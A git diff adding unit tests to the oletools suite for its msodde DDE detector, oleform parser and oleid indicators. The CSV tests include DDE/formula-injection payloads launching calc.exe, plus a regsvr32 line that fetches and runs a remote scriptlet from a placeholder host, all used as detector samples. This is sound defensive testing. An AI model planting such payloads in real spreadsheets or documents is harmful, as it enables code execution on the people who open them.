+ r'\c 1 \b',
+ r'INDEX \e "tab" \c "1" \z "1033"',
+ r'TEMPLATE \* Upper',
+ r'TEMPLATE \p',
+ r'TIME',
+ r'TIME \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'TITLE "My Life, the Fantasy" \* Upper',
+ r'TITLE',
+ r'TOC \o "3-3" \h \z \t "Heading 1,1,Heading 2,2,Appendix 1,1,'
+ r'Appendix 2,2,Unnumbered Heading,1"',
+ r'USERADDRESS',
+ r'USERADDRESS "10 Top Secret Lane, Chiswick" \* Upper',
+ r'USERINITIALS \* Lower',
+ r'USERINITIALS "JaJ"',
+ r'USERINITIALS "jaj" \* Upper',
+ r'XE "Office Open XML" \b',
+ r'XE "syntax" \f "Introduction"',
+ r'XE "behavior:implementation-defined" \b',
+ r'XE "Office Open XML" \i',
+ r'XE "behavior:implementation-defined:documenting" \b',
+ r'XE "grammar" \f "Introduction" \b',
+ r'XE "Office Open XML"',
+ r'XE "item: package-relationship" \t "See package-relationship item"',
+ r'XE "XML" \r OOXMLPageRange',
+ r'XE "grammar" \f "Introduction"',
+ r'XE "production" \f "Introduction"'
+ )
+
+# not (yet) covered
+# (because it should be handled as bad or because our parser does not cover it)
+EXAMPLES_NOMATCH = (
+ r'INCLUDETEXT "E:\\ReadMe.txt"',
+ r'IF DATE \@ "M-d"<>"1-1" "not " new year\'s day.',
+ r'=X + Y',
+ r'=Result * 10',
+ r'=((-1 + X^2) * 3 - Y)/2',
+ r'=COUNT(BELOW)',
+ r'=SUM(LEFT)',
+ r'=AVERAGE(ABOVE)',
+ r'=4+5 \# 00.00',
+ r'=9+6 \# $###',
+ r'=111053+111439 \# x##',
+ r'=1/8 \# 0.00x',
+ r'=3/4 \# .x',
+ r'=95.4 \# $###.00',
+ r'=2456800 \# $#,###,###',
+ r'=80-90 \# -##',
+ r'=90-80 \# -##',
+ r'=90-80 \# +##',
+ r'=33 \# ##%',
+ r'=Price*15% \# "##0.00 \'is the sales tax\'"',
+ r'=SUM(A1:D4) \# "##0.00 \'is the total of Table\' `table`"',
+ r'=Sales95 \# $#,##0.00;-$#,##0.00',
+ r'=Sales95 \# $#,##0.00;-$#,##0.00;$0',
+ r'1 \* AIUEO',
+ r'=54 \* ALPHABETIC',
+ r'=52 \* alphabetic',
+ r'AUTOTEXT "- PAGE -"',
+ r'AUTOTEXT "Yours truly,"',
+ r'AUTOTEXT Confidential',
+ r'AUTOTEXTLIST "List of salutations" \s Salutation '
+ r'\t "Choose a salutation"',
+ r'ADDRESSBLOCK \f "<<_TITLE0_ >><<_FIRST0_>><< _LAST0_>><< _SUFFIX0_>>\n'
+ r'<<_COMPANY_>>\n<<_STREET1_>>\n'
+ r'<<_STREET2_>>\n'
+ r'<<_CITY_>><<, _STATE_>><< _POSTAL_>><<_COUNTRY_>>"',
+ r'ASK AskResponse "What is your first name?"',
+ r'REF AskResponse',
+ r'{ IF { = OR ( { COMPARE { MERGEFIELD CustomerNumber } >= 4 },',
+ r'{ COMPARE { MERGEFIELD CustomerRating } <= 9 } ) } = 1 '
+ r'"Credit not acceptable" "Credit acceptable"}',
+ r'{ COMPARE "{ MERGEFIELD PostalCode }" = "985*" }',
+ r'{ DATABASE \d "C:\\Data\\Sales93.mdb" \c "DSN=MS Access Database;',
+ r'DBQ=C:\\Data\\Sales93.mdb; FIL=RedISAM" '
+ r'\s "select * from \"Customer List\"" \f "2445" \t "2486" \l "2"',
+ r' FILLIN "Please enter the appointment time for '
+ r'MERGEFIELD PatientName :"',
+ r'GOTOBUTTON MyBookmark Dest',
+ r'GOTOBUTTON p3 Page',
+ r'GOTOBUTTON "f 2" Footnote',
+ r'HYPERLINK http://www.example.com/',
+ r'HYPERLINK "E:\\ReadMe.txt"',
+ r'{IF order >= 100 "Thanks" "The minimum order is 100 units" }',
+ r'INCLUDEPICTURE "file:///g:/photos/Ellen%20in%20Oslo.jpg"',
+ r'INCLUDETEXT "file:///C:/Winword/Port Development RFP" Summary',
+ r'INCLUDETEXT "file:///C:/Resume.xml" \n xmlns:a=\"resume-schema\" '
+ r'\t "file:///C:/display.xsl" \x a:Resume/a:Name',
+ r'{ LINK Excel.Sheet.8 "C:\\My Documents\\Profits.xls"',
+ r'"Sheet1!R1C1:R4C4" \a \p }',
+ r'MERGEFIELD CoutesyTitle \f " "',
+ r'MERGEFIELD FirstName \f " "',
+ r'MERGEFIELD LastName',
+ r'= { PRINTDATE \@ "MMddyyyyHHmm" + MERGEREC }',
+ r'MERGEFIELD Name MERGEFIELD Phone',
+ r'NEXT MERGEFIELD Name MERGEFIELD Phone',
+ r'NEXT MERGEFIELD Name MERGEFIELD Phone',
+ r' QUOTE IF DATE \@ "M" = 1 "12" "= DATE \@ "M" - 1"/1/2000 \@',
+ r'"MMMM"',
+ r'RD C:\\Manual\\Chapters\\Chapter1.doc',
+ r'REF _Ref116788778 \r \h',
+ r'SET EnteredBy "Paul Smith"',
+ r'SET UnitCost 25.00',
+ r'SET Quantity FILLIN "Enter number of items ordered:"',
+ r'SET SalesTax 10%',
+ r'SET TotalCost = (UnitCost * Quantity) + ((UnitCost * Quantity) * '
+ r'SalesTax)',
+ r'SKIPIF MERGEFIELD Order < 100',
+ )
+
+
+class TestBlacklist(unittest.TestCase):
+ """ Tests msodde blacklist feature """
+
+ def test_matches(self):
+ """ check a long list of examples that should match the blacklist """
+ for example in EXAMPLES_MATCH:
+ self.assertTrue(field_is_blacklisted(example),
+ msg="Failed to match: '{0}'".format(example))
+
+ def test_nomatches(self):
+ """ check a long list of examples that should match the blacklist """
+ for example in EXAMPLES_NOMATCH:
+ self.assertFalse(field_is_blacklisted(example),
+ msg="Accidentally matched: '{0}'".format(example))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde/test_crypto.py b/tests/msodde/test_crypto.py
new file mode 100644
index 00000000..38b2f06b
--- /dev/null
+++ b/tests/msodde/test_crypto.py
@@ -0,0 +1,32 @@
+"""Check decryption of files from msodde works."""
+
+import sys
+import unittest
+from os.path import basename, join as pjoin
+
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+
+from oletools import crypto
+
+
+@unittest.skipIf(not crypto.check_msoffcrypto(),
+ 'Module msoffcrypto not installed for {}'
+ .format(basename(sys.executable)))
+class MsoddeCryptoTest(unittest.TestCase):
+ """Test integration of decryption in msodde."""
+
+ def test_standard_password(self):
+ """Check dde-link is found in xls[mb] sample files."""
+ for suffix in 'xls', 'xlsx', 'xlsm', 'xlsb':
+ example_file = pjoin(DATA_BASE_DIR, 'encrypted',
+ 'dde-test-encrypt-standardpassword.' + suffix)
+ output, _ = call_and_capture('msodde', [example_file, ])
+ self.assertIn('\nDDE Links:\ncmd /c calc.exe\n', output,
+ msg='Unexpected output {!r} for {}'
+ .format(output, suffix))
+
+ # TODO: add more, in particular a sample with a "proper" password
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde/test_csv.py b/tests/msodde/test_csv.py
new file mode 100644
index 00000000..92131b41
--- /dev/null
+++ b/tests/msodde/test_csv.py
@@ -0,0 +1,129 @@
+#!/usr/bin/env python3
+
+
+""" Check various csv examples """
+
+import unittest
+from tempfile import mkstemp
+import os
+from os.path import join
+
+from oletools import msodde
+from tests.test_utils import DATA_BASE_DIR
+
+
+class TestCSV(unittest.TestCase):
+ """ Check various csv examples """
+
+ DO_DEBUG = False
+
+ def test_texts(self):
+ """ write some sample texts to file, run those """
+ SAMPLES = (
+ "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
+ "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
+ "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
+ "completely innocent text"
+ )
+
+ LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH
+ DELIMITERS = ',\t ;|^'
+ QUOTES = '', '"' # no ' since samples use those "internally"
+ PREFIXES = ('', '{quote}item-before{quote}{delim}',
+ '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
+ '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
+ '{quote}item-before{quote}{delim}')
+ SUFFIXES = ('', '{delim}{quote}item-after{quote}',
+ '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
+ '{delim}{quote}item-after{quote}' +
+ '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)
+
+ for sample_core in SAMPLES:
+ for prefix in PREFIXES:
+ for suffix in SUFFIXES:
+ for delim in DELIMITERS:
+ for quote in QUOTES:
+ # without quoting command is split at space or |
+ if quote == '' and delim in sample_core:
+ continue
+
+ sample = \
+ prefix.format(quote=quote, delim=delim) + \
+ quote + sample_core + quote + delim + \
+ suffix.format(quote=quote, delim=delim)
+ output = self.write_and_run(sample)
+ n_links = len(self.get_dde_from_output(output))
+ desc = 'sample with core={0!r}, prefix-len {1}, ' \
+ 'suffix-len {2}, delim {3!r} and quote ' \
+ '{4!r}'.format(sample_core, len(prefix),
+ len(suffix), delim, quote)
+ if 'innocent' in sample:
+ self.assertEqual(n_links, 0, 'found dde-link '
+ 'in clean sample')
+ else:
+ msg = 'Failed to find dde-link in ' + desc
+ self.assertEqual(n_links, 1, msg)
+ if self.DO_DEBUG:
+ print('Worked: ' + desc)
+
+ def test_file(self):
+ """ test simple small example file """
+ filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
+ output = msodde.process_file(filename, msodde.FIELD_FILTER_BLACKLIST)
+ links = self.get_dde_from_output(output)
+ self.assertEqual(len(links), 1)
+ self.assertEqual(links[0],
+ r"cmd '/k \..\..\..\Windows\System32\calc.exe'")
+
+ def write_and_run(self, sample_text):
+ """ helper for test_texts: save text to file, run through msodde """
+ filename = None
+ handle = 0
+ try:
+ handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
+ os.write(handle, sample_text.encode('ascii'))
+ os.close(handle)
+ handle = 0
+ args = [filename, ]
+ if self.DO_DEBUG:
+ args += ['-l', 'debug']
+
+ processed_args = msodde.process_args(args)
+
+ return msodde.process_file(
+ processed_args.filepath, processed_args.field_filter_mode)
+
+ except Exception:
+ raise
+ finally:
+ if handle:
+ os.close(handle)
+ handle = 0 # just in case
+ if filename:
+ if self.DO_DEBUG:
+ print('keeping for debug purposes: {0}'.format(filename))
+ else:
+ os.remove(filename)
+ filename = None # just in case
+
+ @staticmethod
+ def get_dde_from_output(output):
+ """ helper to read dde links from captured output
+ """
+ return [o for o in output.splitlines()]
+
+ def test_regex(self):
+ """ check that regex captures other ways to include dde commands
+
+ from http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/ and/or
+ https://www.contextis.com/blog/comma-separated-vulnerabilities
+ """
+ kernel = "cmd|'/c calc'!A0"
+ for wrap in '={0}', '@SUM({0})', '"={0}"', '+{0}', '-{0}':
+ cmd = wrap.format(kernel)
+ self.assertNotEqual(msodde.CSV_DDE_FORMAT.match(cmd), None)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde_doc/test_basic.py b/tests/msodde_doc/test_basic.py
deleted file mode 100644
index 0d366b1a..00000000
--- a/tests/msodde_doc/test_basic.py
+++ /dev/null
@@ -1,119 +0,0 @@
-""" Test some basic behaviour of msodde.py
-
-Ensure that
-- doc and docx are read without error
-- garbage returns error return status
-- dde-links are found where appropriate
-"""
-
-from __future__ import print_function
-
-import unittest
-from oletools import msodde
-import shlex
-from os.path import join, dirname, normpath
-import sys
-
-# python 2/3 version conflict:
-if sys.version_info.major <= 2:
- from StringIO import StringIO
- #from io import BytesIO as StringIO - try if print() gives UnicodeError
-else:
- from io import StringIO
-
-
-# base directory for test input
-BASE_DIR = normpath(join(dirname(__file__), '..', 'test-data'))
-
-
-class TestReturnCode(unittest.TestCase):
-
- def test_valid_doc(self):
- """ check that a valid doc file leads to 0 exit status """
- print(join(BASE_DIR, 'msodde-doc/test_document.doc'))
- self.do_test_validity(join(BASE_DIR, 'msodde-doc/test_document.doc'))
-
- def test_valid_docx(self):
- """ check that a valid docx file leads to 0 exit status """
- self.do_test_validity(join(BASE_DIR, 'msodde-doc/test_document.docx'))
-
- def test_invalid_none(self):
- """ check that no file argument leads to non-zero exit status """
- self.do_test_validity('', True)
-
- def test_invalid_empty(self):
- """ check that empty file argument leads to non-zero exit status """
- self.do_test_validity(join(BASE_DIR, 'basic/empty'), True)
-
- def test_invalid_text(self):
- """ check that text file argument leads to non-zero exit status """
- self.do_test_validity(join(BASE_DIR, 'basic/text'), True)
-
- def do_test_validity(self, args, expect_error=False):
- """ helper for test_valid_doc[x] """
- args = shlex.split(args)
- return_code = -1
- have_exception = False
- try:
- return_code = msodde.main(args)
- except Exception:
- have_exception = True
- except SystemExit as se: # sys.exit() was called
- return_code = se.code
- if se.code is None:
- return_code = 0
-
- self.assertEqual(expect_error, have_exception or (return_code != 0))
-
-
-class OutputCapture:
- """ context manager that captures stdout """
-
- def __init__(self):
- self.output = StringIO() # in py2, this actually is BytesIO
-
- def __enter__(self):
- sys.stdout = self.output
- return self
-
- def __exit__(self, exc_type, exc_value, traceback):
- sys.stdout = sys.__stdout__ # re-set to original
-
- if exc_type: # there has been an error
- print('Got error during output capture!')
- print('Print captured output and re-raise:')
- for line in self.output.getvalue().splitlines():
- print(line.rstrip()) # print output before re-raising
-
- def __iter__(self):
- for line in self.output.getvalue().splitlines():
- yield line.rstrip() # remove newline at end of line
-
-
-class TestDdeInDoc(unittest.TestCase):
-
- def test_with_dde(self):
- """ check that dde links appear on stdout """
- with OutputCapture() as capturer:
- msodde.main([join(BASE_DIR, 'msodde-doc', 'dde-test.doc')])
-
- for line in capturer:
- print(line)
- pass # we just want to get the last line
-
- self.assertNotEqual(len(line.strip()), 0)
-
- def test_no_dde(self):
- """ check that no dde links appear on stdout """
- with OutputCapture() as capturer:
- msodde.main([join(BASE_DIR, 'msodde-doc', 'test_document.doc')])
-
- for line in capturer:
- print(line)
- pass # we just want to get the last line
-
- self.assertEqual(line.strip(), '')
-
-
-if __name__ == '__main__':
- unittest.main()
diff --git a/tests/oleform/__init__.py b/tests/oleform/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/oleform/test_basic.py b/tests/oleform/test_basic.py
new file mode 100644
index 00000000..0534c59b
--- /dev/null
+++ b/tests/oleform/test_basic.py
@@ -0,0 +1,262 @@
+""" Test oleform basic functionality """
+
+import unittest
+from os.path import join
+import sys
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+from oletools.olevba import VBA_Parser
+
+# TODO: obviously those results are slightly wrong, there is a bug in the oleform parser
+# but for now we'll accept those as test results until oleform is fixed (see issue #568)
+SAMPLES = [('oleform-PR314.docm',
+ [('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 21,
+ 'caption': 'Label1-test',
+ 'control_tip_text': None,
+ 'id': 1,
+ 'name': 'Label1',
+ 'tabindex': 0,
+ 'tag': 'l\x18sdf',
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 2,
+ 'name': 'TextBox1',
+ 'tabindex': 1,
+ 'tag': None,
+ 'value': 'heyhey'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 25,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 3,
+ 'name': 'ComboBox1',
+ 'tabindex': 2,
+ 'tag': None,
+ 'value': 'none dd'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 26,
+ 'caption': '\xba\xa5\x18mouah',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 5,
+ 'name': 'CheckBox1',
+ 'tabindex': 4,
+ 'tag': None,
+ 'value': '1'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 27,
+ 'caption': '\xba\xa5\x18OptionButt',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 6,
+ 'name': 'OptionButton1',
+ 'tabindex': 5,
+ 'tag': None,
+ 'value': '0'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 28,
+ 'caption': '\xba\xa5\x18ToggleButt',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 7,
+ 'name': 'ToggleButton1',
+ 'tabindex': 6,
+ 'tag': None,
+ 'value': '0'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 14,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 8,
+ 'name': 'Frame1',
+ 'tabindex': 7,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 18,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 10,
+ 'name': 'TabStrip1',
+ 'tabindex': 8,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 17,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 9,
+ 'name': 'CommandButton1',
+ 'tabindex': 9,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 57,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 12,
+ 'name': 'MultiPage1',
+ 'tabindex': 10,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 47,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 16,
+ 'name': 'ScrollBar1',
+ 'tabindex': 11,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 16,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 17,
+ 'name': 'SpinButton1',
+ 'tabindex': 12,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 12,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 18,
+ 'name': 'Image1',
+ 'tabindex': 13,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 24,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 4,
+ 'name': 'ListBox1',
+ 'tabindex': 3,
+ 'tag': None,
+ 'value': ''}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i08',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 20,
+ 'name': 'TextBox2',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': 'abcd'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12',
+ {'ClsidCacheIndex': 18,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 13,
+ 'name': None,
+ 'tabindex': 2,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12',
+ {'ClsidCacheIndex': 7,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 14,
+ 'name': 'Page1',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12',
+ {'ClsidCacheIndex': 7,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 15,
+ 'name': 'Page2',
+ 'tabindex': 1,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12/i14',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 24,
+ 'name': 'TextBox3',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': 'last one'}),
+ ('word/vbaProject.bin',
+ u'UserFormTest2',
+ {'ClsidCacheIndex': 21,
+ 'caption': 'Label1',
+ 'control_tip_text': None,
+ 'id': 1,
+ 'name': 'Label1',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTest2',
+ {'ClsidCacheIndex': 21,
+ 'caption': 'Label2',
+ 'control_tip_text': None,
+ 'id': 2,
+ 'name': 'Label2',
+ 'tabindex': 1,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTest2',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 3,
+ 'name': 'TextBox1',
+ 'tabindex': 2,
+ 'tag': None,
+ 'value': '&\xe9"\''})]
+ )]
+
+class TestOleForm(unittest.TestCase):
+
+ def test_samples(self):
+ if sys.version_info[0] > 2:
+ # Unfortunately, olevba3 doesn't have extract_form_strings_extended
+ return
+ for sample, expected_result in SAMPLES:
+ full_name = join(DATA_BASE_DIR, 'oleform', sample)
+ parser = VBA_Parser(full_name)
+ variables = list(parser.extract_form_strings_extended())
+ self.assertEqual(variables, expected_result)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
+
diff --git a/tests/oleid/__init__.py b/tests/oleid/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/oleid/test_basic.py b/tests/oleid/test_basic.py
new file mode 100644
index 00000000..ce4187aa
--- /dev/null
+++ b/tests/oleid/test_basic.py
@@ -0,0 +1,183 @@
+"""
+Test basic functionality of oleid
+
+Should work with python2 and python3!
+"""
+
+import unittest
+import os
+from os.path import join, relpath, splitext
+from oletools import oleid
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+
+class TestOleIDBasic(unittest.TestCase):
+ """Test basic functionality of OleID"""
+
+ def test_all(self):
+ """Run all file in test-data through oleid and compare to known ouput"""
+ # this relies on order of indicators being constant, could relax that
+ # Also requires that files have the correct suffixes (no rtf in doc)
+ NON_OLE_SUFFIXES = ('.xml', '.csv', '.rtf', '', '.odt', '.ods', '.odp')
+ NON_OLE_VALUES = (False, )
+ WORD = b'Microsoft Office Word'
+ PPT = b'Microsoft Office PowerPoint'
+ EXCEL = b'Microsoft Excel'
+ CRYPT = (True, False, 'unknown', True, False, False, False, False,
+ False, False, 0)
+ OLE_VALUES = {
+ 'oleobj/sample_with_lnk_file.doc': (True, True, WORD, False, True,
+ False, False, False, False,
+ True, 0),
+ 'oleobj/embedded-simple-2007.xlsb': (False,),
+ 'oleobj/embedded-simple-2007.docm': (False,),
+ 'oleobj/embedded-simple-2007.xltx': (False,),
+ 'oleobj/embedded-simple-2007.xlam': (False,),
+ 'oleobj/embedded-simple-2007.dotm': (False,),
+ 'oleobj/sample_with_lnk_file.ppt': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.xlsx': (False,),
+ 'oleobj/embedded-simple-2007.xlsm': (False,),
+ 'oleobj/embedded-simple-2007.ppsx': (False,),
+ 'oleobj/embedded-simple-2007.pps': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.xla': (True, True, EXCEL, False,
+ False, False, True, False,
+ False, False, 0),
+ 'oleobj/sample_with_calc_embedded.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, True, 0),
+ 'oleobj/embedded-unicode-2007.docx': (False,),
+ 'oleobj/embedded-unicode.doc': (True, True, WORD, False, True,
+ False, False, False, False, True,
+ 0),
+ 'oleobj/embedded-simple-2007.doc': (True, True, WORD, False, True,
+ False, False, False, False,
+ True, 0),
+ 'oleobj/embedded-simple-2007.xls': (True, True, EXCEL, False,
+ False, False, True, False,
+ False, False, 0),
+ 'oleobj/embedded-simple-2007.dot': (True, True, WORD, False, True,
+ False, False, False, False,
+ True, 0),
+ 'oleobj/sample_with_lnk_to_calc.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, True, 0),
+ 'oleobj/embedded-simple-2007.ppt': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/sample_with_lnk_file.pps': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.pptx': (False,),
+ 'oleobj/embedded-simple-2007.ppsm': (False,),
+ 'oleobj/embedded-simple-2007.dotx': (False,),
+ 'oleobj/embedded-simple-2007.pptm': (False,),
+ 'oleobj/embedded-simple-2007.xlt': (True, True, EXCEL, False,
+ False, False, True, False,
+ False, False, 0),
+ 'oleobj/embedded-simple-2007.docx': (False,),
+ 'oleobj/embedded-simple-2007.potx': (False,),
+ 'oleobj/embedded-simple-2007.pot': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.xltm': (False,),
+ 'oleobj/embedded-simple-2007.potm': (False,),
+ 'encrypted/encrypted.xlsx': CRYPT,
+ 'encrypted/encrypted.docm': CRYPT,
+ 'encrypted/encrypted.docx': CRYPT,
+ 'encrypted/encrypted.pptm': CRYPT,
+ 'encrypted/encrypted.xlsb': CRYPT,
+ 'encrypted/encrypted.xls': (True, True, EXCEL, True, False, False,
+ True, False, False, False, 0),
+ 'encrypted/encrypted.ppt': (True, False, 'unknown', True, False,
+ False, False, True, False, False, 0),
+ 'encrypted/encrypted.pptx': CRYPT,
+ 'encrypted/encrypted.xlsm': CRYPT,
+ 'encrypted/encrypted.doc': (True, True, WORD, True, True, False,
+ False, False, False, False, 0),
+ 'msodde/harmless-clean.docm': (False,),
+ 'msodde/dde-in-csv.csv': (False,),
+ 'msodde/dde-test-from-office2013-utf_16le-korean.doc':
+ (True, True, WORD, False, True, False, False, False, False,
+ False, 0),
+ 'msodde/harmless-clean.doc': (True, True, WORD, False, True, False,
+ False, False, False, False, 0),
+ 'msodde/dde-test.docm': (False,),
+ 'msodde/dde-test.xlsb': (False,),
+ 'msodde/dde-test.xlsm': (False,),
+ 'msodde/dde-test.docx': (False,),
+ 'msodde/dde-test.xlsx': (False,),
+ 'msodde/dde-test-from-office2003.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, False, 0),
+ 'msodde/dde-test-from-office2016.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, False, 0),
+ 'msodde/harmless-clean.docx': (False,),
+ 'oleform/oleform-PR314.docm': (False,),
+ 'basic/encrypted.docx': CRYPT,
+ 'oleobj/external_link/sample_with_external_link_to_doc.docx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.xlsb': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.dotm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.xlsm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.pptx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.dotx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.docm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.potm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.xlsx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.potx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.ppsm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.pptm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.ppsx': (False,),
+ 'encrypted/autostart-encrypt-standardpassword.xlsm':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/autostart-encrypt-standardpassword.xls':
+ (True, True, EXCEL, True, False, True, True, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xlsx':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xlsm':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/autostart-encrypt-standardpassword.xlsb':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xls':
+ (True, True, EXCEL, True, False, False, True, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xlsb':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ }
+
+ indicator_names = []
+ for base_dir, _, files in os.walk(DATA_BASE_DIR):
+ for filename in files:
+ full_path = join(base_dir, filename)
+ name = relpath(full_path, DATA_BASE_DIR)
+ values = tuple(indicator.value for indicator in
+ oleid.OleID(full_path).check())
+ if len(indicator_names) < 2: # not initialized with ole yet
+ indicator_names = tuple(indicator.name for indicator in
+ oleid.OleID(full_path).check())
+ suffix = splitext(filename)[1]
+ if suffix in NON_OLE_SUFFIXES:
+ self.assertEqual(values, NON_OLE_VALUES,
+ msg='For non-ole file {} expected {}, '
+ 'not {}'.format(name, NON_OLE_VALUES,
+ values))
+ continue
+ try:
+ self.assertEqual(values, OLE_VALUES[name],
+ msg='Wrong detail values for {}:\n'
+ ' Names {}\n Found {}\n Expect {}'
+ .format(name, indicator_names, values,
+ OLE_VALUES[name]))
+ except KeyError:
+ print('Should add oleid output for {} to {} ({})'
+ .format(name, __name__, values))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/oleid/test_issue_166.py b/tests/oleid/test_issue_166.py
new file mode 100644
index 00000000..c350c003
--- /dev/null
+++ b/tests/oleid/test_issue_166.py
@@ -0,0 +1,26 @@
+"""
+Test if oleid detects encrypted documents
+"""
+
+import unittest, sys, os
+
+from tests.test_utils import DATA_BASE_DIR
